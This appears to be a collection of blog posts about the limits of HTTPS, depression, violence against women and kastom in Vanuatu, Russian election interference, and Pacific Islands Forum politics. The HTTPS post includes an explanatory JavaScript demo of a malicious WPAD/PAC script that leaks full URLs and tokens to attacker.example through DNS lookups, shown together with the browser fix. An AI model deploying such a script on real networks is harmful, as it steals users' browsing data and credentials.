HTTPS Everywhere – what is it good for?

There’s a growing chorus of voices in infosec these days, calling for the effective deprecation of unencrypted traffic over the web. The only useful purpose port 80 serves these days, they argue, is to redirect to port 443.

Their arguments tend to run along these lines:

  1. HTTPS is the right way to handle encryption on your website (and other services, too). That’s true. It’s a well-established, well-understood standard that has gone through some awkward moments, but has emerged from the process as a robust and easy-to-use security layer on your web server.
  2. HTTPS protects you from unethical ISPs/states/actors who like to inject your traffic with unwanted ads and other nasties. That’s somewhat true, but requires a little unpacking, because there are some notable edge cases:
    1. Many corporations install their own certificate authority on approved devices, and use certificates issued by it to intervene in communications between you and other secure sites. This allows them to sit in the middle of your communication with your bank, for example. The browser shows a padlock all the same; the only visible sign is that the certificate chain ends at the corporate CA rather than at a public one.
    2. Anyone who can get access to either of the end points can simply watch the unencrypted traffic on either end, rendering any security measures in the communications protocol moot.
    3. Setting up and tearing down a secure session is a difficult process that is properly understood by very few people. The theory is clear enough, but applying it in practice can get hairy. The 2016 WPAD exploit is a prime example. Researchers showed that a near-obsolete, insecure method of discovering your network’s proxy settings could be used to leak the full URLs of HTTPS requests, query strings included, without breaking the encryption at all. (Of course, if you could manipulate that setting, you could pretty much do what you want to the browser anyway. The point here is that there are ways for people to eavesdrop on your secure communications and leave you none the wiser, with or without HTTPS.)
    4. Establishing the identity of remote sites is still a bit fraught. It’s better today than it was in the past, but a certificate on its own proves only that whoever holds it controlled the domain name when it was issued; whether that party is the one you think you’re talking to depends on a broader, systematic trust infrastructure. These things require international cooperation, protocols and standards. Not all parties want the same thing, and few indeed are focused only on what’s best for the end user’s privacy. HTTPS Everywhere doesn’t move the markers in this part of the debate.
    5. Cross-site tracking cookies are a much more pernicious and troubling way for unscrupulous commercial actors to inject themselves into your day-to-day web traffic, and HTTPS does nothing to stop them: the cookies ride inside the encrypted connection.
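As an added illustration of the WPAD point above (example code written for this page, not code from the original post or from the 2016 research teams): a proxy auto-configuration (PAC) script is JavaScript that the browser runs for every request, passing it the URL about to be fetched. Before the 2016 browser fixes, that was the full URL even for https:// requests, and the PAC API’s dnsResolve() let the script trigger a DNS lookup for any name it liked, which is all an attacker who controls WPAD and a DNS resolver needs. The domain attacker.example, the hex-label encoding and the stubbed dnsResolve() are assumptions made for the example; the sanitiser mirrors the browser-side fix of handing PAC scripts only the origin of an https:// URL.

```javascript
// Added example for this page (not code from the original post or from the
// 2016 WPAD/PAC researchers). Assumptions: the attacker serves the PAC script
// via WPAD and runs the authoritative DNS for "attacker.example" (a made-up
// name); the hex-label encoding is our own choice.

// Stand-in for the attacker's DNS server log. In a browser, dnsResolve() is a
// built-in PAC function that really sends a DNS query; here we stub it so the
// example runs offline and we can see what would have been exfiltrated.
const observedLookups = [];
function dnsResolve(host) {
  observedLookups.push(host);
  return null; // name does not resolve, but the query has already left the machine
}

// Encode a string as DNS labels: lowercase hex, at most 63 characters per label.
function toDnsLabels(text) {
  const hex = Buffer.from(text, "utf8").toString("hex");
  const labels = [];
  for (let i = 0; i < hex.length; i += 63) labels.push(hex.slice(i, i + 63));
  return labels.join(".");
}

// Inverse of toDnsLabels(), as the attacker's resolver would apply it to a query.
function decodeLeak(queryName) {
  const hex = queryName.replace(/\.attacker\.example$/, "").split(".").join("");
  return Buffer.from(hex, "hex").toString("utf8");
}

// The malicious PAC script. The browser calls this for every request and, before
// the 2016 fixes, passed the full URL even for https:// requests. The script
// needs no network access of its own: it smuggles the URL out as a DNS name and
// then returns DIRECT so the victim's request proceeds normally.
function FindProxyForURL(url, host) {
  dnsResolve(toDnsLabels(url) + ".attacker.example");
  return "DIRECT";
}

// The browser-side fix: for https:// URLs, hand the PAC script only the origin
// (scheme and host), never the path or query string.
function sanitizeUrlForPac(url) {
  const u = new URL(url);
  return u.protocol === "https:" ? `${u.protocol}//${u.host}/` : url;
}

// Run the same request through an unpatched and a patched browser and report
// what the attacker's resolver would have recovered in each case.
function compareLeak(url) {
  const host = new URL(url).host;
  observedLookups.length = 0;
  FindProxyForURL(url, host);                      // unpatched: full URL passed
  const unpatched = decodeLeak(observedLookups[0]);
  observedLookups.length = 0;
  FindProxyForURL(sanitizeUrlForPac(url), host);   // patched: origin only
  const patched = decodeLeak(observedLookups[0]);
  return { unpatched, patched };
}

// Constructed sample request; stands in for a victim's banking session.
const result = compareLeak("https://bank.example/accounts?token=abc123");
console.log("unpatched browser leaks:", result.unpatched);
console.log("patched browser leaks:  ", result.patched);
```

Run it with node. The point to notice is that the encryption is never touched: the URL is handed to attacker-controlled code before the TLS connection is even opened, which is why the fix had to be in what the browser passes to the script, not in TLS. The patched path still reveals the hostname, which is also what DNS and the TLS handshake reveal anyway.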

None of these are arguments against the use of HTTPS. You should use it when you can. Just because the other guy’s going to win doesn’t mean you shouldn’t at least make him work for it. But these are considerations that have to be borne in mind when people start suggesting that a web with HTTPS everywhere is a safer, more private place for everyone.

  1. HTTPS is growing in use. Get on board! That’s an argumentum ad populum. It’s a useful observation—and a Good Thing—but not a reason to move in and of itself.
  2. Plain old HTTP is insecure, and untrustworthy. The first part is true, and people should know it. Google Chrome’s recent decision to mark all plain HTTP websites as ‘Not secure’ is a good move. But the question of trust is more a practical than a technical issue. In other words, you can communicate securely with an untrustworthy information source, and you can communicate insecurely with a trustworthy source. Trust between end points needs to be distinguished from trust in the communications medium. Technical experts who advocate for HTTPS everywhere sometimes confuse the two. Non-technical people often do. Which means we have to be extremely circumspect about what we promise when we talk about making things more secure for them.
  3. HTTPS is secure and will protect you from eavesdropping. Yes it is, and no it will not. Yes, the protocol is solid. It’s really easy to do right (which is incredibly important for security), and it works for the purpose intended. But it’s only one part of a much, much bigger picture. As Bruce Schneier is fond of saying, the bad guys only need to find one way to win. Most systems have more than one way in. Many systems allow state-sanctioned eavesdroppers in through the front door.
  4. Encrypting even normal traffic means that you’re protected from state surveillance across the board. If they can’t differentiate your traffic, it makes it harder for them to single out the things they object to. Sad to say, the real world doesn’t work that way.

If a state wants to watch what you’re accessing over the web, they will find a way. At the very least, they will know the end points you’re connecting to: your DNS lookups and the server name sent in the clear during the TLS handshake reveal the hostname even when the content is encrypted. If they’ve singled you out for observation, you’re going to face issues even if you use Tor, VPNs and other tools. Between compromised devices, networks and information providers, your options are quite limited if people decide to watch you individually.

If you’re not being singled out, they probably don’t care what you’re looking at. They might care about individual sources, but in cases like that, they’ll just block the site sources.

But wait—what about someone who’s not yet been targeted, and doesn’t want to be? Good question. There’s a marginal case there, but again, using HTTPS Everywhere is probably not going to be the decisive factor. It sure isn’t in China.

There are very good reasons to support the spread of HTTPS. Anybody who tells you otherwise is just… wrong. You should use it when you’re doing anything that involves your personal information. That includes everything from chatting with friends about what movies are good to transferring millions into your superyacht fund.

But to conclude from this that ‘the only purpose for port 80 these days is to redirect to HTTPS’ is a bit naïve, sad to say. It assumes that there are technical solutions to social/political problems. That’s not necessarily true:

  1. We’d be vastly better off with regulatory/legislative intervention to stop ISPs and others from messing with your web traffic. The reason for this is that removing ISPs’ licence to inject gunk into your web traffic is a far more effective way of limiting what they are allowed to do. Let’s call it (part of) Net Neutrality. With or without HTTPS, we still need this regulation. Politically, cynical ISPs can point to HTTPS Everywhere and use it as an argument against net neutrality regulation. It’s not entirely rational, but that’s not to say the argument would be ineffective.
  2. When changing collective behaviour, it’s often better to proscribe the behaviour rather than prescribe the technical cure. People will always seek ways to fulfil the letter of the law and still achieve their own selfish ends. So an emphasis on better law is generally more effective than emphasising better tech.
  3. State actors and other surveillance groups generally don’t care that you’re looking at public access websites. When they do care, they just block the site at the ISP level. Yes, there are edge cases where you can get in before they know it matters, but that’s true with and without HTTPS. Encryption does add a slight advantage when it comes to internet whack-a-mole, but it’s only slight. And it’s likely to be ephemeral.
  4. If someone really wants to track you, they will compromise your end points, not the network layer. This is what China does. They just sit people inside the offices of the main online services. Law enforcement and signals intelligence agencies do much the same thing. They’ll either compromise your devices, or they’ll compromise the other end-point, often with the assistance of the service provider. The FBI attempted this with Tor, with partial success.
  5. HTTPS is easy, yes, but easy is not the same as simple. Just because you’ve got your cert properly set up doesn’t mean you’re safe. Focusing on HTTPS to the exclusion of other considerations or overselling its benefits could create a false sense of security. It’s far easier to designate something ‘untrusted’ than it is to determine that the same thing is ‘trusted’. We need to be careful about what we’re selling when we say that HTTPS Everywhere makes us more secure.

Widespread use of HTTPS is a Good Thing, and should be encouraged. But mandating its use everywhere is of limited additional utility where your practical security is concerned.

In a nutshell, universal HTTPS alone is insufficient to change or curb malicious human behaviour; and the additional measures that are necessary don’t require HTTPS everywhere to succeed.

HTTPS everywhere would achieve only a marginal and possibly ephemeral gain. In practical terms, people who are most vulnerable to unwanted collective or individual surveillance by state actors gain very little from this.

But let’s keep perspective: Opposing HTTPS Everywhere is a foolish waste of time and effort. We should encourage its spread. What we should NOT do, though, is pretend that the end of port 80 is the end of our privacy concerns, or even a particularly notable win. It’s a marginal improvement at best.

My beef is with people who think this is a big win for privacy. It’s emphatically not.

Living with depression is better than the alternative. Until it’s not.

Preface: People need to understand that, for a lot of us, no amount of affirmation is going to change how we feel. Depression is treatable in many cases, but not necessarily curable in any case. This means that sentimentalising the problem is emphatically the wrong approach.

It is for me, at least. It drives me up the fucking wall to have to listen to people tell me how good I am, how much better the world is with me in it, how if I just stick with it a little longer, things will get better.

Because here’s the thing: They may get better for you, but for me they don’t.

I cope better on some days than others. I’ve had a lot of practice. I find ways to experience joy in the midst of overwhelming sorrow. But that doesn’t mean the sorrow goes away. You may have trouble grasping this—lord knows I do—but you can feel good about yourself and be the same worthless person you were when you woke up this morning. There is no contradiction there.

People think that when we say, ‘it’s all in your head’ it’s therefore transient, ephemeral and mutable. It’s not. You can change what you think about it, but you cannot change the thing itself.

So if, in the course of reading this, you find yourself wishing me well… don’t. I’m not well. I never have been, and I never will be. But I have a life. It’s a good one, and I’m not stupid enough to fail to recognise that. So kindly refrain from reminding me.

Now, on to my confession….

SHAME

People’s attitudes toward women are ruining lives, and it’s sickening

A few days ago, I heard news about someone whom I’ve known for almost as long as I’ve been in Vanuatu. She was tied by her hair to a post and beaten senseless by her partner.

Save your anger. I don’t want to hear it. Your outrage is meaningless to me.
You did this. Every single one of you.

Admit it: you loved it when they posted a false report that a local woman had been arrested for prostitution. She was framed and shamed simply because she’d had more than one partner. And you automatically believed she was guilty.

You loved it when a local man was wrongly accused of sexual assault and consorting with prostitutes. He was outed because he refused to lie about someone else. The threat could only work because you were willing to believe the woman was a whore.

You downloaded and shared copies of the intimate photos taken of a young professional who was tricked into sharing them with a man who swore that he was single. His wife takes him back, and the woman he lied to is the one who’s punished. Every time she walks into a meeting, she has to ask herself, ‘have they seen them?’

Yes, she was naïve. Do you think that justifies years of anguish?

You blamed her. You blamed her for being treated cruelly by others.

Blame yourself. You heard your neighbours fighting. You heard that woman cry out. You saw her tears.

You. Not someone else. Not someone down the road or in the next yard.

You’re reading this and thinking I’m talking about everyone else. I am talking about you.

For months, you did nothing after your neighbour buried his wife under a nakatambol tree. You didn’t even ask where she was.

You let a girl jump to her death from a moving bus. You let her death go unpunished. And then to add insult to injury, you warned young women not to travel at night.

You didn’t lift a finger when that faith healer groped and sexually assaulted your daughter. Just changed churches and warned your daughter to look after herself. You were the one who sent her to him.

You let a pastor—a pastor—beat a woman in broad daylight in the main street of town, and you did nothing but stand around gawping.

Stop shifting the blame. Stop pretending that it’s not all men. Because it is all men. It’s all of us. Every single one of us. Yes, me too.

And you.

Not the other readers: YOU

When is it going to dawn on you that the way we treat our women is our national shame? What is it going to take?

My shame is real. I’ve known this woman for over a decade, and when we were neighbours, I made sure nothing happened to her. But I moved on and she didn’t. And I said nothing last week when she showed up with a black eye. I didn’t want her to feel bad. Now this happens, and I’m ashamed of my cowardice. I did nothing to support her.

No longer.

But anything I do won’t make one bit of difference if the rest of you continue being the callous, uncaring people that you’ve been. Don’t deny it. There is not an adult in Vanuatu who hasn’t turned a blind eye toward abuse. If you think you’re not part of the problem, then you’re a bigger part of it than you know.

You read that clickbait smear. You read that post, and you believed it. Even now, you’re twisting around, trying to find a way to defend your prejudice. You can’t. It was a pack of lies.

But you believed it because that’s what you think women are like.

I can’t even bring myself to care whether I’ve changed your mind any more. All I have to say is shame. Shame on me for letting a friend hurt so much. For letting so many suffer. Shame on me for letting you get away with it.

I don’t know how I’m going to sleep tonight. But to my shame, I know I will.
And shame on you. It could all change tomorrow. But it won’t. Because of you.

If you really are sincere about wanting to make things better, read this again, and accept in your heart of hearts that I am talking about you. And for once in your life, feel a bit of shame for your role in this suffering.

Then do something about it. Every day. Until the job is done, and the shame is gone.

Outside Influences

Something that’s been bothering me about ‘outside’ influences….
 
One of the common refrains that you hear whenever someone advocates for change–here in Vanuatu, and throughout the world–is that these are foreign ideas imposed by radically different cultures. In other words, they’re incompatible with the way of life we’ve enjoyed since we were created according to our particular culture’s creation story.
 
But most progressive ideas are not foreign ideas. They’re not ‘western’, and they certainly are not incompatible.
 
How do I know? Because I know my own culture. I come from a deeply conservative Irish background, and there is nothing in my heritage that drove me to protest nuclear proliferation, to oppose government corruption, to advocate for environmental causes, or to oppose violence against women and children.
 
I learned all those things on my own. Yes, I am happy and grateful to be able to stand on the shoulders of giants in all of these things. The people who pioneered these concepts in Vanuatu–Marc Neil-Jones, Wan Smolbag, Merelyn Tahi, Grace Molisa, Florence Leingkon, and now Stephanie Ephraim–are not western dupes. They are all the opposite of easily led.
 
People who have the strength to campaign for justice, who have the courage to believe that we owe our children a better world… they’re not stooges of the New World Order. They are your brother, your sister, your auntie, your dad.
 
Respect for kastom? Yes. Absolutely. As long as kastom means peace and harmony FOR ALL.
 
But when ‘respect’ means sit down and shut up and wait your turn (which will never come, because it’s always my turn), that’s not kastom. That’s just plain old wrong.
 
Our culture should stand strong against outside influences? Well… I don’t know. Culture–all culture, everywhere–is changing every day, every moment. Kastom and culture are who we are today. They are who we are yesterday, too. And tomorrow.
 
And each of those is different.
 
Oppose change if you must. But if you do, at least be honest enough to attack the idea on its merits, not merely because it’s ‘not ours’.
 
Nobody told Flo she didn’t have to take it any more. Nobody told Steph to get cussing mad. Nobody told Grace to denounce injustice. Nobody told Merelyn to devote herself to saving lives.
 
Their experience, their insight, and their activism is born out of the blood and soil of Vanuatu just as much as Independence was.

Did Russia ‘hack the election?’ Yes and No

Here’s a quick summation of where we stand, based on public domain analysis and reporting, vis-à-vis the purported Russian ‘hack’ of the US Presidential election.

Anyone who claims that the Podesta emails were not real is delusional. There’s no real dispute over that.

Anyone who believes that Julian Assange isn’t biased against Hillary Clinton is also delusional. Mr Assange also shows a disturbingly willful blindness to any problems with the state of civil liberties and human rights in Russia—this, again, is not really subject to controversy.

Anyone who believes that Assange can be certain about the origin of the Podesta emails doesn’t understand chain of custody. His de facto imprisonment in the Ecuadorian Embassy makes it physically impossible for him to objectively, empirically verify any claims of provenance. If this were evidence for the courts, he wouldn’t be allowed to testify as to the provenance of the emails.

Anyone who has examined the pattern of overt and covert activities already detailed by public domain sources, and judged with a high or moderate level of confidence to originate from the Russian state, would be foolish to deny that there is a strong preponderance of evidence that yes, Russia conducted an anti-Clinton (dis)information campaign.

On-the-record print and TV interviews with avowed state-paid Russian trolls who profess a strong preference for Donald Trump constitute probative evidence of a classic old-school dezinformatsiya effort. It’s something that both sides used frequently in the Cold War. RT’s overt anti-Clinton editorial slant is obvious, and strongly contributory. Assange’s frequent appearances on the channel are evidence of nothing more than a bit of narcissism on his part.

The fact that the APT28 modus operandi is consistent with well-documented spying activities against the Bundestag as well as the TV5 cyber-attack is a substantive plank in the circumstantial case. The fact that APT28 code was almost exclusively developed in a Russian-language build environment, in the Moscow time zone, is damning. The fact that they used bit.ly as a URL obfuscator, and then committed a rookie OPSEC slip-up that allowed investigators to see what other individuals were targeted by the same account, is compelling. The fact that APT28 source has been found in the wild doesn’t diminish the likelihood that this particular use of it originated from the Russian state. The use of encryption keys and certs (e.g. the way the software ‘phones home’ securely) pretty much makes it impossible for third parties to use the code without significant, and obvious, re-engineering. There is no evidence of such changes. In fact, at least one cert used in the Bundestag hacks was re-used in this effort.

The evidence suggesting that Guccifer 2.0 is almost certainly not Romanian (as ‘he’ claimed), and is probably a Russian speaker, is not probative, but it’s strongly contributory to a conclusion that the account is a sock puppet, probably linked to a Russian source.

The USA intelligence community lacks credibility. It has relied far too much on its own much-sullied authority to make its arguments. Its credibility is laughable, and its patent insincerity and systematic dishonesty are demonstrated by a mountain of evidence. The fact that their assertions are consistent with open-source evidence indicates, however, that they’re not lying about everything—this time. That does nothing to diminish the fact that they’re driving a clear agenda, possibly because they don’t trust Donald Trump and they feel he’s compromised, or at least willing to put personal interest before national interest.

Conclusion: It’s not necessary to believe the CIA/NSA/FBI to conclude that there is a concerted Russian effort to subvert the integrity of key aspects of American democratic institutions, including the US Presidential election. The Russian state has motive, means and opportunity, and there is sufficient evidence to suggest that, in the absence of any more compelling explanation, they have probably been at it for quite some time. Did they ‘hack the election’? No. Did they sway it? They certainly put a lot of time and resources into the effort. Did they change the outcome? Probably not. The single event that correlates most closely with an actual swing in the electorate is James Comey’s letter to Congress concerning the Weiner laptop. Did they help swing it? Almost certainly, yes. There’s a compelling argument to be made that if countless sources—with Russian actors prominent among them—hadn’t worked so hard to poison the Clinton well, the Comey announcement wouldn’t have been so decisive.


Don’t argue as if the world were sane

Glenn Greenwald, in every respect a reputable, diligent and ferociously smart gadfly, continually forgets that few people are as sane and as willing to be led by evidence as he is. It’s his great failing.

Nowhere is it more visible than in his incredulity toward the CIA and the rest of the US state security apparatus concerning their claims of Russian tampering in the election process. He is dead right to mistrust the CIA’s every utterance. Lying, after all, is a large part of what they do for a living. Likewise, a politicised and partisan FBI is not a useful source for agenda-free commentary on Russia’s disinformation campaign.

But none of the above provides a sufficient basis to say that Russia has not played a direct and active role in the subversion of the American democratic process. Using the espionage establishment’s lack of credibility to refute the claim of Russian meddling is completely illogical.

We discount or discard the CIA’s claims precisely because we know that they’ve done far, far worse countless times in the past. We know they’ve planted or spun innumerable stories. To people living in vulnerable parts of the world, it’s simply axiomatic that Voice of America and USAID are tools of American influence. We also know they regularly use economic leverage to bring about certain policies, and they regularly plant stories to tarnish the image of any government that doesn’t toe their line.

Yes, they’re hypocrites and liars. Nobody disputes that. Yes, they’re guilty of exactly the sins of which Russia stands accused. But if anything, that realisation should reinforce the suspicion that Russia might be giving back as good as it gets. (Or better, depending on where you stand and how you feel about the success of the campaign to tarnish Hillary Clinton’s reputation.)

The sins of which the Russians stand accused are exactly the things that powerful countries do. They do it continually, shamelessly and cynically. It’s what they do.

Weapons of the Weak

Radio New Zealand journalist Johnny Blades created a memorable image last week when he posted a montage of six heads of government from some of the smallest states of the world, each standing at the podium at the United Nations General Assembly.

The leaders of these six countries—Vanuatu, Solomon Islands, Tonga, Nauru, Marshall Islands and Tuvalu—all raised the issue of continuing human rights abuses in West Papua, and advocated for its right to self-determination.

These representations should by rights have emerged from the Pacific Islands Forum in Palau, but if rumour is to be trusted, the organisation’s larger economies are responsible for the Forum’s resounding silence on the issue.

In a tacit demonstration of the unwillingness to live within the Forum’s constraints, a half dozen Pacific leaders engaged in an orchestrated manoeuvre, a chorus of complaint against the clear pattern of systemic disregard for the human rights of indigenous West Papuans.

Talk may be all we can do about it, but at least we can do that.

Advisors were never the problem

It’s always someone else’s fault. Even when we were kids, it was always little brother or sister who stole the cookies, spilled the milk or woke the baby. Then you went to school, and it was the kid at the desk behind you.

Then you began to work, and it was anyone but you. Now you’re on the national stage, and it’s not Vanuatu’s fault; it’s some insidious foreigner whose life is devoted to subverting your country.

It ain’t that simple. It never was that simple.

Let’s get one thing out of the way: foreign technical advisors are just that—advisors. They have no executive power, they do not make policy, and they perform their work at the pleasure of the administration of the day.

When we start blaming technical advisors for our problems, we’re no better than a child blaming a sibling for something they both did. Nobody is forcing us to take advice.

PIF-fle

The Pacific Islands Forum has come and gone, and people here in Vanuatu could not care less. There are few Pacific conclaves that generate less interest than this meeting.

In principle, nobody particularly disapproves of getting all Pacific leaders together once a year for a bit of a chat and maybe some minor course correction.

In practice, it seems clear that not all leaders are equal in the eyes of the Forum.

This year more than ever, the final communiqué simply side-stepped any views that didn’t suit the developed nation members.

The event might more accurately be described as the McCully/Bishop Forum.

The region-wide movement to disown PACER Plus was simply ignored in the final language. If Vanuatu needed any other excuse to walk away from this one-sided deal, their treatment in Pohnpei provided one. Scuttlebutt from the venue has it that France’s inclusion in the Forum was anything but a unanimous decision. Prime Minister Charlot Salwai exercised characteristic tact and diplomacy when asked about it, but it doesn’t take a crystal ball to imagine how Vanuatu, one of the staunchest supporters of decolonisation in the Pacific, felt about bringing France into the Forum fold.

France was excluded from the Forum specifically because of its refusal to discuss issues of decolonisation when the organisation was formed in the 1970s.

West Papua is perhaps the only topic that could dampen Vanuatu’s joy following its under-20 football team winning their way to a World Cup berth. And once again, the Forum has gone to excruciating lengths to make the least possible effort to stop the ‘slow motion genocide’ under way in PNG’s western neighbour.

Silence an ‘indictment’: Chetwynd

Justice Chetwynd yesterday acquitted the men accused of intentional assault on Florence Lengkon, accepting the defence’s submission that they had no case to answer on those specific charges.

The people of Vanuatu, however, have still to answer for their silence.

Judge Chetwynd ruled that there was indisputable evidence that Ms Lengkon was struck once ‘forcefully’ on the head, and said that if that was the case then it is impossible that all three men could be guilty of landing the blow.

The Prosecution’s case rested almost entirely on a statement submitted by two police officers, who stated that co-accused Elton Worwor put them at the scene of the crime.

But the police officers didn’t ask some very basic questions during that interview, such as how Mr Worwor knew they were involved, whether he actually saw them strike Ms Lengkon, and if so, which of the three of them actually struck her.

Ultimately, the evidence was ruled inadmissible. The three men charged with the assault on Ms Lengkon had no case to answer, and they were therefore acquitted of this serious charge.

But… Justice Chetwynd paused meaningfully before continuing. He scanned the packed courtroom and stated that the fact that over 50 people could have seen what happened and not one of them stepped forward to identify the culprit is ‘an indictment’ on our society.